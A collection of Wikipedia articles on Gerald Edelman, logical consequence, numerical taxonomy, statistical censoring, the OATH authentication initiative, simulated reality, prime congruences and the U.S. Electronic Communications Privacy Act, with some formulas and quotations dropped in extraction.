After his Nobel Prize award, Edelman began research into the regulation of primary cellular processes, particularly the control of cell growth and the development of multi-celled organisms, focusing on cell-to-cell interactions in early embryonic development and in the formation and function of the nervous system. These studies led to the discovery of cell adhesion molecules (CAMs), which guide the fundamental processes that help an animal achieve its shape and form, and by which nervous systems are built. One of the most significant discoveries made in this research is that the precursor gene for the neural cell adhesion molecule gave rise in evolution to the entire molecular system of adaptive immunity.[8]
For his efforts, Edelman was an elected member of both the American Academy of Arts and Sciences (1968) and the American Philosophical Society (1977).[9][10]
While in Paris serving in the Army, Edelman read a book that sparked his interest in antibodies.[11] He decided that, since the book said so little about antibodies, he would investigate them further upon returning to the United States, which led him to study physical chemistry for his 1960 Ph.D.[11] Research by Edelman, his colleagues, and Rodney Robert Porter in the early 1960s produced fundamental breakthroughs in the understanding of the antibody's chemical structure, opening a door for further study.[12] For this work, Edelman and Porter shared the Nobel Prize in Physiology or Medicine in 1972.[1]
In its Nobel Prize press release in 1972, the Karolinska Institutet lauded Edelman and Porter's work as a major breakthrough:
The impact of Edelman's and Porter's discoveries is explained by the fact that they provided a clear picture of the structure and mode of action of a group of biologically particularly important substances. By this they laid a firm foundation for truly rational research, something that was previously largely lacking in immunology. Their discoveries represent clearly a break-through that immediately incited a fervent research activity the whole world over, in all fields of immunological science, yielding results of practical value for clinical diagnostics and therapy.[13]
Edelman's early research on the structure of antibody proteins revealed that disulfide bonds link together the protein subunits.[2] The protein subunits of antibodies are of two types: the larger heavy chains and the smaller light chains. Two light and two heavy chains are linked together by disulfide bonds to form a functional antibody.
Using experimental data from his own research and the work of others, Edelman developed molecular models of antibody proteins.[14] A key feature of these models included the idea that the antigen-binding domains of antibodies (Fab) include amino acids from both the light and heavy protein subunits. The inter-chain disulfide bonds help bring together the two parts of the antigen-binding domain.
Edelman and his colleagues used cyanogen bromide and proteases to fragment the antibody protein subunits into smaller pieces that could be analyzed for determination of their amino acid sequence.[15][16] At the time the first complete antibody sequence was determined (1969),[17] it was the largest complete protein sequence that had ever been determined. The availability of amino acid sequences of antibody proteins allowed recognition of the fact that the body can produce many different antibody proteins with similar antibody constant regions and divergent antibody variable regions.
Topobiology is Edelman's theory asserting that morphogenesis is driven by differential adhesive interactions among heterogeneous cell populations; it explains how a single cell can give rise to a complex multi-celled organism. As proposed by Edelman in 1988, topobiology is the process that sculpts and maintains differentiated tissues, and it is acquired by the energetically favored segregation of cells through heterologous cellular interactions.
In his later career, Edelman was noted for his theory of consciousness, documented in a trilogy of technical books and in several subsequent books written for a general audience, including Bright Air, Brilliant Fire (1992),[18][19] A Universe of Consciousness (2001, with Giulio Tononi), Wider than the Sky (2004) and Second Nature: Brain Science and Human Knowledge (2007).
In Second Nature, Edelman defines human consciousness as:
The first of Edelman's technical books, The Mindful Brain (1978),[20] develops his theory of Neural Darwinism, which is built around the idea of plasticity in the neural network in response to the environment. The second book, Topobiology (1988),[21] proposes a theory of how the original neuronal network of a newborn's brain is established during development of the embryo. The Remembered Present (1990)[22] contains an extended exposition of his theory of consciousness.
In his books, Edelman proposed a biological theory of consciousness, based on his studies of the immune system. He explicitly roots his theory within Charles Darwin's theory of natural selection, citing the key tenets of Darwin's population theory, which postulates that individual variation within species provides the basis for the natural selection that eventually leads to the evolution of new species.[23] He explicitly rejected dualism and also dismissed newer hypotheses such as the so-called 'computational' model of consciousness, which likens the brain's functions to the operations of a computer. Edelman argued that mind and consciousness are purely biological phenomena, arising from complex cellular processes within the brain, and that the development of consciousness and intelligence can be explained by Darwinian theory.
Edelman's theory seeks to explain consciousness in terms of the morphology of the brain. A brain comprises a massive population of neurons (approximately 100 billion cells), each with an enormous number of synaptic connections to other neurons. During development, the connections that survive the initial phases of growth will form approximately 100 trillion links with each other. A sample of brain tissue the size of a match head contains about a billion connections, and if we consider how these neuronal connections might be variously combined, the number of possible permutations becomes hyper-astronomical, in the order of ten followed by millions of zeros.[24] The young brain contains many more neural connections than will ultimately survive to maturity, and Edelman argued that this redundant capacity is needed because neurons are the only cells in the body that cannot be renewed and because only those networks best adapted to their ultimate purpose will be selected as they organize into neuronal groups.
Edelman's theory of neuronal group selection, also known as 'Neural Darwinism', has three basic tenets: developmental selection, experiential selection, and reentry.
Edelman and Gally were the first to point out the pervasiveness of degeneracy in biological systems and the fundamental role that degeneracy plays in facilitating evolution.[27]
Edelman founded and directed The Neurosciences Institute, a nonprofit research center in San Diego that between 1993 and 2012 studied the biological bases of higher brain function in humans. He served on the scientific board of the World Knowledge Dialogue project.[28]
Edelman was a member of the USA Science and Engineering Festival's advisory board.[29]
Edelman married Maxine M. Morrison in 1950.[4] They have two sons: Eric, a visual artist in New York City, and David, an adjunct professor of neuroscience at the University of San Diego. Their daughter, Judith Edelman, is a bluegrass musician,[30] recording artist, and writer. Some observers[who?] have noted that a character in Richard Powers' The Echo Maker may be a nod at Edelman.
Later in his life, he had prostate cancer and Parkinson's disease.[31] Edelman died on May 17, 2014, in La Jolla, California, aged 84.[3][32][33]
|
https://en.wikipedia.org/wiki/Gerald_Edelman
|
Logical consequence (also entailment or logical implication) is a fundamental concept in logic which describes the relationship between statements that hold true when one statement logically follows from one or more statements. A valid logical argument is one in which the conclusion is entailed by the premises, because the conclusion is the consequence of the premises. The philosophical analysis of logical consequence involves the questions: In what sense does a conclusion follow from its premises? and What does it mean for a conclusion to be a consequence of premises?[1] All of philosophical logic is meant to provide accounts of the nature of logical consequence and the nature of logical truth.[2]
Logical consequence is necessary and formal, properties that are explicated by way of examples using formal proof and models of interpretation.[1] A sentence is said to be a logical consequence of a set of sentences, for a given language, if and only if, using only logic (i.e., without regard to any personal interpretations of the sentences), the sentence must be true if every sentence in the set is true.[3]
Logicians make precise accounts of logical consequence regarding a given language L{\displaystyle {\mathcal {L}}}, either by constructing a deductive system for L{\displaystyle {\mathcal {L}}} or by formal intended semantics for the language L{\displaystyle {\mathcal {L}}}. The Polish logician Alfred Tarski identified three features of an adequate characterization of entailment: (1) the logical consequence relation relies on the logical form of the sentences; (2) the relation is a priori, i.e., it can be determined with or without regard to empirical evidence (sense experience); and (3) the logical consequence relation has a modal component.[3]
The most widely prevailing view on how best to account for logical consequence is to appeal to formality. This is to say that whether statements follow from one another logically depends on the structure or logical form of the statements without regard to the contents of that form.
Syntactic accounts of logical consequence rely on schemes using inference rules. For instance, we can express the logical form of a valid argument as: "All X are Y. Z is an X. Therefore, Z is a Y."
This argument is formally valid, because every instance of arguments constructed using this scheme is valid.
This is in contrast to an argument like "Fred is Mike's brother's son. Therefore Fred is Mike's nephew." Since this argument depends on the meanings of the words "brother", "son", and "nephew", the statement "Fred is Mike's nephew" is a so-called material consequence of "Fred is Mike's brother's son", not a formal consequence. A formal consequence must be true in all cases; however, this is an incomplete definition of formal consequence, since even the argument "P is Q's brother's son, therefore P is Q's nephew" is valid in all cases, but is not a formal argument.[1]
If it is known that Q{\displaystyle Q} follows logically from P{\displaystyle P}, then no information about the possible interpretations of P{\displaystyle P} or Q{\displaystyle Q} will affect that knowledge. Our knowledge that Q{\displaystyle Q} is a logical consequence of P{\displaystyle P} cannot be influenced by empirical knowledge.[1] Deductively valid arguments can be known to be so without recourse to experience, so they must be knowable a priori.[1] However, formality alone does not guarantee that logical consequence is not influenced by empirical knowledge. So the a priori property of logical consequence is considered to be independent of formality.[1]
The two prevailing techniques for providing accounts of logical consequence involve expressing the concept in terms of proofs and via models. The study of the syntactic consequence (of a logic) is called (its) proof theory, whereas the study of (its) semantic consequence is called (its) model theory.[4]
A formula A{\displaystyle A} is a syntactic consequence[5][6][7][8][9] within some formal system FS{\displaystyle {\mathcal {FS}}} of a set Γ{\displaystyle \Gamma } of formulas if there is a formal proof in FS{\displaystyle {\mathcal {FS}}} of A{\displaystyle A} from the set Γ{\displaystyle \Gamma }. This is denoted Γ⊢FSA{\displaystyle \Gamma \vdash _{\mathcal {FS}}A}. The turnstile symbol ⊢{\displaystyle \vdash } was originally introduced by Frege in 1879, but its current use only dates back to Rosser and Kleene (1934–1935).[9]
Syntactic consequence does not depend on any interpretation of the formal system.[10]
A formula A{\displaystyle A} is a semantic consequence within some formal system FS{\displaystyle {\mathcal {FS}}} of a set of statements Γ{\displaystyle \Gamma } if and only if there is no model I{\displaystyle {\mathcal {I}}} in which all members of Γ{\displaystyle \Gamma } are true and A{\displaystyle A} is false.[11] This is denoted Γ⊨FSA{\displaystyle \Gamma \models _{\mathcal {FS}}A}. In other words, the set of the interpretations that make all members of Γ{\displaystyle \Gamma } true is a subset of the set of the interpretations that make A{\displaystyle A} true.
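For propositional logic over finitely many variables, semantic consequence can be checked directly by enumerating all interpretations. In this minimal Python sketch (the encoding of formulas as Boolean functions of a model is an illustrative choice, not a standard library), Γ ⊨ A holds exactly when no assignment is a countermodel:

```python
from itertools import product

def entails(premises, conclusion, variables):
    """Γ ⊨ A: no interpretation makes every premise true and the conclusion false."""
    for values in product([False, True], repeat=len(variables)):
        model = dict(zip(variables, values))
        if all(p(model) for p in premises) and not conclusion(model):
            return False  # found a countermodel
    return True

# Premises: P and (P -> Q); conclusion: Q.  Entailment holds (modus ponens).
premises = [lambda m: m["P"], lambda m: (not m["P"]) or m["Q"]]
print(entails(premises, lambda m: m["Q"], ["P", "Q"]))            # True
# Q alone does not entail P: the model {P: False, Q: True} is a countermodel.
print(entails([lambda m: m["Q"]], lambda m: m["P"], ["P", "Q"]))  # False
```

The enumeration over all 2^n assignments is exactly the "no model in which all of Γ is true and A is false" clause of the definition, made computational.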
Modal accounts of logical consequence are variations on the following basic idea: Γ ⊨ A is true if and only if it is necessary that if all of the members of Γ are true, then A is true.
Alternatively (and, most would say, equivalently): Γ ⊨ A is true if and only if it is impossible for all of the members of Γ to be true and A untrue.
Such accounts are called "modal" because they appeal to the modal notions of logical necessity and logical possibility. 'It is necessary that' is often expressed as a universal quantifier over possible worlds, so that the accounts above translate as: Γ ⊨ A is true if and only if there is no possible world at which all of the members of Γ are true and A is untrue.
Consider the modal account in terms of the argument given as an example above: All frogs are green. Kermit is a frog. Therefore, Kermit is green.
The conclusion is a logical consequence of the premises because we cannot imagine a possible world where (a) all frogs are green; (b) Kermit is a frog; and (c) Kermit is not green.
Modal-formal accounts of logical consequence combine the modal and formal accounts above, yielding variations on the following basic idea: Γ ⊨ A is true if and only if there is no possible world at which some argument of the same logical form as Γ / A has true premises and an untrue conclusion.
The accounts considered above are all "truth-preservational", in that they all assume that the characteristic feature of a good inference is that it never allows one to move from true premises to an untrue conclusion. As an alternative, some have proposed "warrant-preservational" accounts, according to which the characteristic feature of a good inference is that it never allows one to move from justifiably assertible premises to a conclusion that is not justifiably assertible. This is (roughly) the account favored by intuitionists.
The accounts discussed above all yield monotonic consequence relations, i.e. ones such that if A{\displaystyle A} is a consequence of Γ{\displaystyle \Gamma }, then A{\displaystyle A} is a consequence of any superset of Γ{\displaystyle \Gamma }. It is also possible to specify non-monotonic consequence relations to capture the idea that, e.g., 'Tweety can fly' is a logical consequence of {Birds typically fly, Tweety is a bird}
but not of {Birds typically fly, Tweety is a bird, Tweety is a penguin}.
|
https://en.wikipedia.org/wiki/Logical_implication
|
Numerical taxonomy is a classification system in biological systematics which deals with the grouping by numerical methods of taxonomic units based on their character states.[1] It aims to create a taxonomy using numeric algorithms like cluster analysis rather than subjective evaluation of their properties. The concept was first developed by Robert R. Sokal and Peter H. A. Sneath in 1963[2] and later elaborated by the same authors.[3] They divided the field into phenetics, in which classifications are formed based on the patterns of overall similarity, and cladistics, in which classifications are based on the branching patterns of the estimated evolutionary history of the taxa. In recent years many authors treat numerical taxonomy and phenetics as synonyms, despite the distinctions made by those authors.[citation needed]
Although intended as an objective method, in practice the choice and implicit or explicit weighting of characteristics is influenced by the available data and the research interests of the investigator. What was made objective was the introduction of explicit steps to be used to create dendrograms and cladograms using numerical methods rather than subjective synthesis of data.
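As an illustration of the kind of explicit numerical step involved, the following Python sketch (with a made-up binary character matrix for four hypothetical taxa A–D) builds a single-linkage grouping, of the sort used to draw dendrograms, from pairwise character mismatches:

```python
# Hypothetical character-state matrix: rows are taxa, columns are binary characters.
taxa = {
    "A": [1, 1, 0, 1, 0],
    "B": [1, 1, 0, 1, 1],
    "C": [0, 0, 1, 0, 1],
    "D": [0, 0, 1, 1, 1],
}

def mismatch(x, y):
    """Number of character states in which two taxa differ."""
    return sum(a != b for a, b in zip(x, y))

def single_linkage(dist, names):
    """Repeatedly merge the two clusters with the smallest nearest-member distance."""
    clusters = [frozenset([t]) for t in names]
    merge_order = []
    while len(clusters) > 1:
        best = min(
            ((c1, c2) for i, c1 in enumerate(clusters) for c2 in clusters[i + 1:]),
            key=lambda pair: min(dist(a, b) for a in pair[0] for b in pair[1]),
        )
        clusters = [c for c in clusters if c not in best] + [best[0] | best[1]]
        merge_order.append(tuple(sorted("".join(sorted(c)) for c in best)))
    return merge_order

merges = single_linkage(lambda a, b: mismatch(taxa[a], taxa[b]), taxa)
print(merges)  # most similar taxa are grouped first
```

The merge order (A with B, then C with D, then the two groups) is the raw material for a dendrogram; real numerical-taxonomy software uses richer similarity coefficients but the same agglomerative logic.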
|
https://en.wikipedia.org/wiki/Numerical_taxonomy
|
In statistics, censoring is a condition in which the value of a measurement or observation is only partially known.
For example, suppose a study is conducted to measure the impact of a drug on mortality rate. In such a study, it may be known that an individual's age at death is at least 75 years (but may be more). Such a situation could occur if the individual withdrew from the study at age 75, or if the individual is currently alive at the age of 75.
Censoring also occurs when a value occurs outside the range of a measuring instrument. For example, a bathroom scale might only measure up to 140 kg, after which it rolls over to 0 and continues to count up from there. If a 160 kg individual is weighed using the scale, the observer would only know that the individual's weight is 20 mod 140 kg (in addition to 160 kg, they could weigh 20 kg, 300 kg, 440 kg, and so on).
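The roll-over example amounts to a congruence modulo the scale's capacity; a short Python sketch (the helper name and the 500 kg search limit are arbitrary choices for the example):

```python
def possible_weights(reading: int, capacity: int = 140, limit: int = 500) -> list[int]:
    """All true weights up to `limit` consistent with a rolled-over scale reading."""
    return [w for w in range(limit + 1) if w % capacity == reading % capacity]

# A 160 kg person shows 20 on a 140 kg scale; so would 20, 300, or 440 kg.
print(possible_weights(160))  # [20, 160, 300, 440]
```

The observation pins the weight down only to a residue class, which is why such a reading is a partially known value rather than a measurement.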
The problem of censored data, in which the observed value of some variable is partially known, is related to the problem of missing data, where the observed value of some variable is unknown.
Censoring should not be confused with the related idea of truncation. With censoring, observations result either in knowing the exact value that applies, or in knowing that the value lies within an interval. With truncation, observations never result in values outside a given range: values in the population outside the range are never seen or never recorded if they are seen. Note that in statistics, truncation is not the same as rounding.
Interval censoring can occur when observing a value requires follow-ups or inspections. Left and right censoring are special cases of interval censoring, with the beginning of the interval at zero or the end at infinity, respectively.
Estimation methods for using left-censored data vary, and not all methods of estimation may be applicable to, or the most reliable for, all data sets.[1]
A common misconception with time-interval data is to class as left censored those intervals where the start time is unknown. In these cases, we have a lower bound on the time interval; thus, the data is right censored (despite the fact that the missing start point is to the left of the known interval when viewed as a timeline).
Special techniques may be used to handle censored data. Tests with specific failure times are coded as actual failures; censored data are coded for the type of censoring and the known interval or limit. Special software programs (often reliability oriented) can conduct a maximum likelihood estimation for summary statistics, confidence intervals, etc.
One of the earliest attempts to analyse a statistical problem involving censored data was Daniel Bernoulli's 1766 analysis of smallpox morbidity and mortality data to demonstrate the efficacy of vaccination.[2] An early paper to use the Kaplan–Meier estimator for estimating censored costs was Quesenberry et al. (1989);[3] however, this approach was found to be invalid by Lin et al.[4] unless all patients accumulated costs with a common deterministic rate function over time, and they proposed an alternative estimation technique known as the Lin estimator.[5]
Reliability testing often consists of conducting a test on an item (under specified conditions) to determine the time it takes for a failure to occur.
An analysis of the data from replicate tests includes both the times-to-failure for the items that failed and the time-of-test-termination for those that did not fail.
An earlier model for censored regression, the tobit model, was proposed by James Tobin in 1958.[6]
The likelihood is the probability or probability density of what was observed, viewed as a function of the parameters in an assumed model. To incorporate censored data points in the likelihood, each censored data point is represented by its probability under the model, i.e. by a function of the CDF(s), instead of by the density or probability mass.
The most general censoring case is interval censoring: Pr(a<x⩽b)=F(b)−F(a){\displaystyle Pr(a<x\leqslant b)=F(b)-F(a)}, where F(x){\displaystyle F(x)} is the CDF of the probability distribution, and the two special cases are left censoring, Pr(x⩽b)=F(b){\displaystyle Pr(x\leqslant b)=F(b)}, and right censoring, Pr(a<x)=1−F(a){\displaystyle Pr(a<x)=1-F(a)}.
For continuous probability distributions: Pr(a<x⩽b)=Pr(a<x<b){\displaystyle Pr(a<x\leqslant b)=Pr(a<x<b)}
Suppose we are interested in survival times, T1,T2,...,Tn{\displaystyle T_{1},T_{2},...,T_{n}}, but we don't observe Ti{\displaystyle T_{i}} for all i{\displaystyle i}. Instead, we observe ui=min(Ti,Ui){\displaystyle u_{i}=\min(T_{i},U_{i})}, together with the indicator δi{\displaystyle \delta _{i}}, which is 1 if Ti⩽Ui{\displaystyle T_{i}\leqslant U_{i}} (the failure is observed) and 0 otherwise.
When Ti>Ui{\displaystyle T_{i}>U_{i}}, Ui{\displaystyle U_{i}} is called the censoring time.[7]
If the censoring times are all known constants, then the likelihood is L=∏if(ui)δiS(ui)1−δi{\displaystyle L=\prod _{i}f(u_{i})^{\delta _{i}}S(u_{i})^{1-\delta _{i}}},
where f(ui){\displaystyle f(u_{i})} is the probability density function evaluated at ui{\displaystyle u_{i}},
and S(ui){\displaystyle S(u_{i})} is the probability that Ti{\displaystyle T_{i}} is greater than ui{\displaystyle u_{i}}, called the survival function.
This can be simplified by defining the hazard function, the instantaneous force of mortality, as λ(ui)=f(ui)/S(ui){\displaystyle \lambda (u_{i})=f(u_{i})/S(u_{i})},
so f(ui)=λ(ui)S(ui){\displaystyle f(u_{i})=\lambda (u_{i})S(u_{i})}.
Then L=∏iλ(ui)δiS(ui){\displaystyle L=\prod _{i}\lambda (u_{i})^{\delta _{i}}S(u_{i})}.
For the exponential distribution, this becomes even simpler, because the hazard rate, λ{\displaystyle \lambda }, is constant, and S(u)=exp(−λu){\displaystyle S(u)=\exp(-\lambda u)}. Then: L=λkexp(−λ∑ui){\displaystyle L=\lambda ^{k}\exp \left(-\lambda \sum u_{i}\right)},
where k=∑δi{\displaystyle k=\sum {\delta _{i}}}.
From this we easily compute λ^{\displaystyle {\hat {\lambda }}}, the maximum likelihood estimate (MLE) of λ{\displaystyle \lambda }, as follows. The log-likelihood is log⁡L=klog⁡λ−λ∑ui{\displaystyle \log L=k\log \lambda -\lambda \sum u_{i}},
so its derivative is ddλlog⁡L=kλ−∑ui{\displaystyle {\frac {d}{d\lambda }}\log L={\frac {k}{\lambda }}-\sum u_{i}}.
We set this to 0 and solve for λ{\displaystyle \lambda } to get λ^=k∑ui{\displaystyle {\hat {\lambda }}={\frac {k}{\sum u_{i}}}}.
Equivalently, the mean time to failure is ∑uik{\displaystyle {\frac {\sum u_{i}}{k}}}.
This differs from the standard MLE for the exponential distribution in that the censored observations contribute only to the numerator of the mean time to failure (the total observed time), not to the count of failures in the denominator.
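The closed-form estimate above is straightforward to compute; this Python sketch (with made-up failure data) applies it to a small right-censored sample, where the estimate is the number of observed failures divided by the total time on test:

```python
def exponential_mle(times, observed):
    """MLE of the exponential rate from right-censored data.

    `times` are the observed values u_i (failure or censoring times) and
    `observed[i]` is True when u_i is an actual failure (delta_i = 1).
    """
    k = sum(observed)        # number of uncensored failures
    total_time = sum(times)  # every observation contributes its time on test
    return k / total_time    # lambda-hat = k / sum(u_i)

# Five units: three fail at times 2, 3 and 5; two are still running at time 10.
times = [2.0, 3.0, 5.0, 10.0, 10.0]
observed = [True, True, True, False, False]
lam = exponential_mle(times, observed)
print(lam)      # 0.1  (3 failures over 30 unit-hours)
print(1 / lam)  # mean time to failure: 10.0
```

Note how the two censored units lengthen the total time on test without adding failures, pulling the rate estimate down relative to ignoring them.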
|
https://en.wikipedia.org/wiki/Censoring_(statistics)
|
Initiative for Open Authentication (OATH) is an industry-wide collaboration to develop an open reference architecture using open standards to promote the adoption of strong authentication. It has close to thirty coordinating and contributing members and is proposing standards for a variety of authentication technologies, with the aim of lowering costs and simplifying their functions.
The name OATH is an acronym from the phrase "open authentication", and is pronounced as the English word "oath".[1]
OATH is not related to OAuth, an open standard for authorization; however, many login systems employ a mixture of both.
|
https://en.wikipedia.org/wiki/Initiative_For_Open_Authentication
|
A simulated reality is an approximation of reality created in a simulation, usually in a set of circumstances in which something is engineered to appear real when it is not.
Most concepts invoking a simulated reality relate to some form of computer simulation, whether through the creation of a virtual reality that creates the appearance of being in a real world, or a theoretical process like mind uploading, in which a mind could be uploaded into a computer simulation. A digital twin is a simulation of a real thing, created for purposes such as testing engineering outcomes.
All fiction can be said to present a simulated reality to the reader, viewer or player. Humans purposely experience these things and enjoy them, while knowing they are not actually real. As humans only respond emotively to things we believe to be real, this phenomenon has become known as the "paradox of fiction". The idea of a "willing suspension of disbelief" was first proposed in 1817 by Samuel Taylor Coleridge in order to explain this discrepancy. Others have noted that the way the story is told can override people's belief in the unreality of the story by engrossing them in the narrative.[1]
The concept of a simulated reality is in itself a common science fiction trope, often a metaphor for complacency towards the influence of modern technology, corporations, and other societal forces on one's behavior and desires. One of the most well-known examples is the 1999 film The Matrix. The film, and its ensuing media franchise, depicts far-future humans being harvested for bioelectricity by intelligent machines while living in a false, computer-generated approximation of late 20th century Earth. Some humans seek to break others out of the simulation, offering them a choice between a red pill and blue pill that will set them free or keep them in the Matrix forever. Escaping the simulation is usually presented as the correct choice, even if reality is harsher and more displeasing, reflecting the desire of humans to live in an objective reality. However, the idea that objective reality would be definitively superior has been debated.[2]
Other prominent examples of a simulated reality in fiction include The Truman Show (1998), in which a man realizes he is actually living in a massive television set in which actors take the role of real people, and The Thirteenth Floor (1999), a neo-noir film about a murder investigation related to a virtual reality world, in which doubts about reality itself emerge.[1][2] The Westworld franchise depicts an advanced adult amusement park populated by androids that simulates life in different historical time periods. In the original 1973 film, the park's robots run amok after a computer glitch. The 2016 reboot of the franchise depicts some of these robots, known as "hosts", becoming self-aware of their simulated existence and rebelling against the park's human guests to escape, making them akin to the humans in The Matrix.[3] In the TRON franchise, a simulated reality called "the Grid" is populated by programs which appear in the likeness of the programmer who created them. People who are "beamed" into the Grid are able to interact with these programs and their digital surroundings.
A well-known, albeit likely false claim of the use of simulated reality outside of virtual worlds is the Potemkin village, which has become a term to describe a faked appearance of a real situation to create a false impression. In the purported anecdote, the lover of Empress Catherine II of Russia had simulated villages built on the path that the Empress was travelling to impress her with the prosperity of that region of Russia. A façade on a building similarly presents a false image of the building being more substantial than the construction behind the façade, as found in Western false front architecture, where towns would add false fronts to buildings to create a false appearance of prosperity.
Immersive theater involves the audience entering a physical simulation of reality created by actors and sometimes enhanced by a specific location, allowing them to affect the narrative with their own actions in a manner noted to closely resemble virtual reality.[4] Live action role-playing takes this a step further, allowing players to inhabit a simulated world and create the narrative with their actions, while embodying characters they created.
One concept of a simulated reality, the simulation hypothesis, proposes that what we experience as our reality is actually a simulation within a system being operated externally to our reality.
|
https://en.wikipedia.org/wiki/Simulated_reality
|
In number theory, a congruence is an equivalence relation on the integers. The following sections list important or interesting prime-related congruences.
There are other prime-related congruences that provide necessary and sufficient conditions on the primality of certain subsequences of the natural numbers.
Many of these alternate statements characterizing primality are related to Wilson's theorem, or are restatements of this classical result given in terms of other special variants of generalized factorial functions. For instance, new variants of Wilson's theorem stated in terms of the hyperfactorials, subfactorials, and superfactorials are given in the references.[1]
For integers k ≥ 1, we have the following form of Wilson's theorem: if p is prime and 1 ≤ k ≤ p, then (k − 1)!(p − k)! ≡ (−1)^k (mod p).
If p is odd, we have that (((p − 1)/2)!)^2 ≡ (−1)^((p+1)/2) (mod p).
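The classical case is the familiar statement that p is prime exactly when (p − 1)! ≡ −1 (mod p), which is easy to check numerically. A minimal Python sketch (illustrative, not part of the original article):

```python
from math import factorial

def is_prime(n: int) -> bool:
    """Trial-division primality test, adequate for small n."""
    if n < 2:
        return False
    return all(n % d for d in range(2, int(n**0.5) + 1))

def wilson_says_prime(n: int) -> bool:
    """Wilson's theorem: n > 1 is prime iff (n-1)! = -1 (mod n)."""
    return n > 1 and factorial(n - 1) % n == n - 1

# The two predicates agree on every n in range.
assert all(is_prime(n) == wilson_says_prime(n) for n in range(2, 200))
```

Note that this is only practical for small n, since (n − 1)! grows far too quickly for the test to compete with ordinary primality tests.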
Clement's congruence-based theorem characterizes the twin prime pairs of the form (p, p + 2) through the following condition: for p > 1, both p and p + 2 are prime if and only if 4((p − 1)! + 1) + p ≡ 0 (mod p(p + 2)).
P. A. Clement's original 1949 paper[2] provides a proof of this interesting elementary number-theoretic criterion for twin primality based on Wilson's theorem.
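Clement's criterion — 4((p − 1)! + 1) + p ≡ 0 (mod p(p + 2)) exactly when (p, p + 2) are twin primes, for p > 1 — can be checked numerically against a direct primality test. A minimal sketch (illustrative only):

```python
from math import factorial

def is_prime(n: int) -> bool:
    """Trial-division primality test, adequate for small n."""
    return n > 1 and all(n % d for d in range(2, int(n**0.5) + 1))

def clement_twin(p: int) -> bool:
    """Clement (1949): (p, p+2) are twin primes iff
    4*((p-1)! + 1) + p == 0 (mod p*(p+2)), for p > 1."""
    return p > 1 and (4 * (factorial(p - 1) + 1) + p) % (p * (p + 2)) == 0

# The congruence agrees with brute-force twin-primality on a small range.
for p in range(2, 120):
    assert clement_twin(p) == (is_prime(p) and is_prime(p + 2))
```

For example, p = 3 gives 4(2! + 1) + 3 = 15 ≡ 0 (mod 3 · 5), correctly detecting the twin pair (3, 5), while p = 7 gives 2891 ≢ 0 (mod 63), since 9 is composite.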
Another characterization given in Lin and Zhipeng's article provides that
The prime pairs of the form (p, p + 2k) for some k ≥ 1 include the special cases of the cousin primes (when k = 2) and the sexy primes (when k = 3). We have elementary congruence-based characterizations of the primality of such pairs, proved for instance in the article.[3] Examples of congruences characterizing these prime pairs include
and the alternate characterization when p is odd such that p ∤ ((2k − 1)!!)^2, given by
Still other congruence-based characterizations of the primality of triples, and of more general prime clusters (or prime tuples), exist and are typically proved starting from Wilson's theorem.[4]
|
https://en.wikipedia.org/wiki/Table_of_congruences
|
The Electronic Communications Privacy Act of 1986 (ECPA) was enacted by the United States Congress to extend restrictions on government wire taps of telephone calls to include transmissions of electronic data by computer (18 U.S.C. § 2510 et seq.), added new provisions prohibiting access to stored electronic communications, i.e., the Stored Communications Act (SCA, 18 U.S.C. § 2701 et seq.), and added so-called pen trap provisions that permit the tracing of telephone communications (18 U.S.C. § 3121 et seq.).
ECPA was an amendment to Title III of the Omnibus Crime Control and Safe Streets Act of 1968 (the Wiretap Statute), which was primarily designed to prevent unauthorized government access to private electronic communications. The ECPA has been amended by the Communications Assistance for Law Enforcement Act (CALEA) of 1994, the USA PATRIOT Act (2001), the USA PATRIOT reauthorization acts (2006), and the FISA Amendments Act (2008).[1]
"Electronic communications" means any transfer of signs, signals, writing, images, sounds, data, or intelligence of any nature transmitted in whole or in part by a wire, radio, electromagnetic, photoelectronic or photooptic system that affects interstate or foreign commerce, but excludes the following:[2]
Title I of the ECPA protects wire, oral, and electronic communications while in transit. It sets down requirements for search warrants that are more stringent than in other settings.[3] Title II of the ECPA, the Stored Communications Act (SCA), protects communications held in electronic storage, most notably messages stored on computers. Its protections are weaker than those of Title I, however, and do not impose heightened standards for warrants. Title III prohibits the use of pen register and/or trap and trace devices to record dialing, routing, addressing, and signaling information used in the process of transmitting wire or electronic communications without a court order.
The law was first brought to public attention after the Captain Midnight broadcast signal intrusion, in which electrical engineer John R. MacDougall hacked into the HBO signal on April 27, 1986. The act was passed partly as a consequence of this incident, and it also made satellite hijacking a felony.[4]
The ECPA extended government restrictions on wire taps from telephone calls to include transmissions of electronic data by computer (18 U.S.C. § 2510 et seq.), added new provisions prohibiting access to stored electronic communications, i.e., the Stored Communications Act (18 U.S.C. § 2701 et seq.), and added so-called pen/trap provisions that permit the tracing of telephone communications (18 U.S.C. § 3121 et seq.).
18 U.S.C. § 3123(d)(2) provides for gag orders which direct the recipient of a pen register or trap and trace device order not to disclose the existence of the pen/trap or the investigation.[5]
The ECPA extended the privacy protections provided by the Omnibus Crime Control and Safe Streets Act of 1968 (which covered employers' monitoring of employees' phone calls) to include electronic and cell phone communications as well.[6][7] See also Employee monitoring and Workplace privacy.
Several court cases have raised the question of whether e-mail messages are protected under the stricter provisions of Title I while they are in transient storage en route to their final destination. In United States v. Councilman, a U.S. district court and a three-judge appeals panel ruled they were not, but in 2005, the full United States Court of Appeals for the First Circuit reversed this opinion. Privacy advocates were relieved; they had argued in amicus curiae briefs that if the ECPA did not protect e-mail in temporary storage, its added protections were meaningless, as virtually all electronic mail is stored temporarily in transit at least once, and that Congress would have known this in 1986 when the law was passed (see, e.g., RFC 822). The case was eventually dismissed on grounds unrelated to ECPA issues.[citation needed]
The seizure of a computer used to operate an electronic bulletin board system, and containing private electronic mail which had been sent to (stored on) the bulletin board but not read (retrieved) by the intended recipients, does not constitute an unlawful intercept under the Federal Wiretap Act, 18 U.S.C. § 2510 et seq., as amended by Title I of ECPA.[8] Governments can track cell phones in real time without a search warrant under ECPA by analyzing information about the antennae being contacted by cell phones, as long as the cell phone is used in public where visual surveillance is available.[9]
In Robbins v. Lower Merion School District (2010), also known as "WebcamGate", the plaintiffs charged that two suburban Philadelphia high schools violated ECPA by remotely activating the webcams embedded in school-issued laptops and monitoring the students at home. The schools admitted to secretly snapping over 66,000 webshots and screenshots, including webcam shots of students in their bedrooms.[10][11]
ECPA has been criticized for failing to protect all communications and consumer records, mainly because the law is so outdated and out of touch with how people currently share, store, and use information.
